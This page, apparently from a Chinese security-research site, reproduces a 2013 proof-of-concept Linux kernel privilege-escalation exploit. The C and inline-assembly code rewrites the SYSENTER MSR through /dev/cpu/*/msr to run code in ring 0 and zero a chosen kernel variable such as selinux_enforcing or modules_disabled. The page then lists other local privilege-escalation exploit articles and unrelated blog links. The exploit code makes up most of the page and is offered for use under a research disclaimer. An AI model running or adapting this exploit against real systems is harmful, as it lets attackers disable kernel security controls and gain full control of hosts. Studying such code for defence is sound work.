本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. // PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
  2. // can do whatever in the commented area, re-enable module support, etc
  3. // requires CONFIG_X86_MSR and just uid 0
  4. // a small race exists between the time when the MSR is written to the first
  5. // time and when we issue our sysenter
  6. // we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
  7. // configured to take a hex arg of a dword pointer to set to 0
  8. // (modules_disabled, selinux_enforcing, take your pick)
  9. //
  10. // Hello to Red Hat, who has shown yet again to not care until a
  11. // public exploit is released. Not even a bugtraq entry existed in
  12. // their system until this was published -- and they have a paid team
  13. // of how many?
  14. // It's not as if I didn't mention the problem and existence of an easy
  15. // exploit multiple times prior:
  16. // https://twitter.com/grsecurity/status/298977370776432640
  17. // https://twitter.com/grsecurity/status/297365303095078912
  18. // https://twitter.com/grsecurity/status/297189488638181376
  19. // https://twitter.com/grsecurity/status/297030133628416000
  20. // https://twitter.com/grsecurity/status/297029470072745984
  21. // https://twitter.com/grsecurity/status/297028324134359041
  22. //
  23. // spender 2013
  24. #define _GNU_SOURCE
  25. #include<stdio.h>
  26. #include<sched.h>
  27. #include<unistd.h>
  28. #include<sys/types.h>
  29. #include<sys/stat.h>
  30. #include<fcntl.h>
  31. #include<stdlib.h>
  32. #include<sys/time.h>
  33. #include<sys/resource.h>
  34. #include<sys/mman.h>
  35. #define SYSENTER_EIP_MSR 0x176
  36. u_int64_t msr;
  37. unsignedlong ourstack[65536];
  38. u_int64_t payload_data[16];
  39. externvoid*_ring0;
  40. externvoid*_ring0_end;
  41. void ring0(void)
  42. {
  43. __asm volatile(".globl _ring0\n"
  44. "_ring0:\n"
  45. ".intel_syntax noprefix\n"
  46. ".code64\n"
  47. // set up stack pointer with 'ourstack'
  48. "mov esp, ecx\n"
  49. // save registers, contains the original MSR value
  50. "push rax\n"
  51. "push rbx\n"
  52. "push rcx\n"
  53. "push rdx\n"
  54. // play with the kernel here with interrupts disabled!
  55. "mov rcx, qword ptr [rbx+8]\n"
  56. "test rcx, rcx\n"
  57. "jz skip_write\n"
  58. "mov dword ptr [rcx], 0\n"
  59. "skip_write:\n"
  60. // restore MSR value before returning
  61. "mov ecx, 0x176\n"// SYSENTER_EIP_MSR
  62. "mov eax, dword ptr [rbx]\n"
  63. "mov edx, dword ptr [rbx+4]\n"
  64. "wrmsr\n"
  65. "pop rdx\n"
  66. "pop rcx\n"
  67. "pop rbx\n"
  68. "pop rax\n"
  69. "sti\n"
  70. "sysexit\n"
  71. ".code32\n"
  72. ".att_syntax prefix\n"
  73. ".global _ring0_end\n"
  74. "_ring0_end:\n"
  75. );
  76. }
  77. unsignedlong saved_stack;
  78. int main(int argc,char*argv[])
  79. {
  80. cpu_set_tset;
  81. int msr_fd;
  82. int ret;
  83. u_int64_t new_msr;
  84. struct sched_param sched;
  85. u_int64_t resolved_addr =0ULL;
  86. if(argc ==2)
  87. resolved_addr = strtoull(argv[1], NULL,16);
  88. /* can do this without privilege */
  89. mlock(_ring0,(unsignedlong)_ring0_end -(unsignedlong)_ring0);
  90. mlock(&payload_data,sizeof(payload_data));
  91. CPU_ZERO(&set);
  92. CPU_SET(0,&set);
  93. sched.sched_priority =99;
  94. ret = sched_setscheduler(0, SCHED_FIFO,&sched);
  95. if(ret){
  96. fprintf(stderr,"Unable to set priority.\n");
  97. exit(1);
  98. }
  99. ret = sched_setaffinity(0,sizeof(cpu_set_t),&set);
  100. if(ret){
  101. fprintf(stderr,"Unable to set affinity.\n");
  102. exit(1);
  103. }
  104. msr_fd = open("/dev/cpu/0/msr", O_RDWR);
  105. if(msr_fd <0){
  106. msr_fd = open("/dev/msr0", O_RDWR);
  107. if(msr_fd <0){
  108. fprintf(stderr,"Unable to open /dev/cpu/0/msr\n");
  109. exit(1);
  110. }
  111. }
  112. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  113. ret = read(msr_fd,&msr,sizeof(msr));
  114. if(ret !=sizeof(msr)){
  115. fprintf(stderr,"Unable to read /dev/cpu/0/msr\n");
  116. exit(1);
  117. }
  118. // stuff some addresses in a buffer whose address we
  119. // pass to the "kernel" via register
  120. payload_data[0]= msr;
  121. payload_data[1]= resolved_addr;
  122. printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);
  123. fflush(stdout);
  124. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  125. new_msr =(u_int64_t)(unsignedlong)&_ring0;
  126. printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);
  127. fflush(stdout);
  128. ret = write(msr_fd,&new_msr,sizeof(new_msr));
  129. if(ret !=sizeof(new_msr)){
  130. fprintf(stderr,"Unable to modify /dev/cpu/0/msr\n");
  131. exit(1);
  132. }
  133. __asm volatile(
  134. ".intel_syntax noprefix\n"
  135. ".code32\n"
  136. "mov saved_stack, esp\n"
  137. "lea ecx, ourstack\n"
  138. "lea edx, label2\n"
  139. "lea ebx, payload_data\n"
  140. "sysenter\n"
  141. "label2:\n"
  142. "mov esp, saved_stack\n"
  143. ".att_syntax prefix\n"
  144. );
  145. printf("Success.\n");
  146. return0;
  147. }

Linux Kernel 'MSR' Driver Local Privilege Escalation的更多相关文章

  1. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  2. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  3. Linux kernel AACRAID Driver Compat IOCTL 本地安全绕过漏洞

    漏洞名称: Linux kernel AACRAID Driver Compat IOCTL 本地安全绕过漏洞 CNNVD编号: CNNVD-201311-390 发布时间: 2013-11-29 更 ...

  4. [转]Mac OS X local privilege escalation (IOBluetoothFamily)

    Source: http://joystick.artificialstudios.org/2014/10/mac-os-x-local-privilege-escalation.html Nowad ...

  5. Linux Kernel ---- PCI Driver 分析

    自己笔记使用. Kernel 版本 4.15.0 (ubuntu 18.04,intel skylake) 最近想学习VGA驱动去了解 DDCCP / EDID 等协议,然后顺便了解下驱动是如何工作的 ...

  6. [EXP]Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)

    #include "stdafx.h" #include <Windows.h> #include "resource.h" void DropRe ...

  7. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  8. ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)

    ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728) By Perception Point Resear ...

  9. Linux Kernel - Debug Guide (Linux内核调试指南 )

    http://blog.csdn.net/blizmax6/article/details/6747601 linux内核调试指南 一些前言 作者前言 知识从哪里来 为什么撰写本文档 为什么需要汇编级 ...

随机推荐

  1. UITableView学习总结

    一.UITableView概述 UITableView继承自UIScrollView,可以表现为Plain和Grouped两种风格. UITableView有两个Delegate分别为:dataSou ...

  2. Linux编译安装MySQL5.6

    为了防止无良网站的爬虫抓取文章,特此标识,转载请注明文章出处.LaplaceDemon/SJQ. http://www.cnblogs.com/shijiaqi1066/p/4311061.html ...

  3. mysql修改root密码的方法

    方法1: 用SET PASSWORD命令 首先登录MySQL. 格式:mysql> set password for 用户名@localhost = password('新密码'); 例子:my ...

  4. SimpleDateFormat使用详解

    http://blog.csdn.net/gubaohua/article/details/575488 public class SimpleDateFormat extends DateForma ...

  5. jquery 操作 checkbox

    对checkbox的其他几个操作 1. 全选2. 取消全选3. 选中所有奇数4. 反选5. 获得选中的所有值 js代码 $("document").ready(function() ...

  6. OpenCart 之registry功用

    1. “Registry”设计模式 在OpenCart中,Registry是整个系统的信息中枢. Registry是一个单例(Singleton),在index.php起始页面中, 首先作为构造函数参 ...

  7. 强制关闭myeclipse出现的问题

    重启时,可能会出现打不开关闭前所在的workspace.其他workspace可以正常打开. 今天遇到这个问题,以前就遇到过,但是忘记如何解决了.今天在我等了十多分钟后,神奇的myeclipse自己起 ...

  8. 简单的SqlHelper

    namespace Login { class SqlHelper { //连接数据库的字符串 //static string dataConnection = "server=***-PC ...

  9. Python:标准数据类型6种

    #!/usr/bin/python3 #python的基本语法和数据类型 #python3中 一行有多个语句,用分号分割(;) print("aaa") ;print(" ...

  10. FlightGear 视角控制

    Flightgear提供了非常灵活的模块化功能 这里就简要记录一下视角切换功能 首先,需要了解一下Flightgear中的property tree的主要内容,这里暂略. http://wiki.fl ...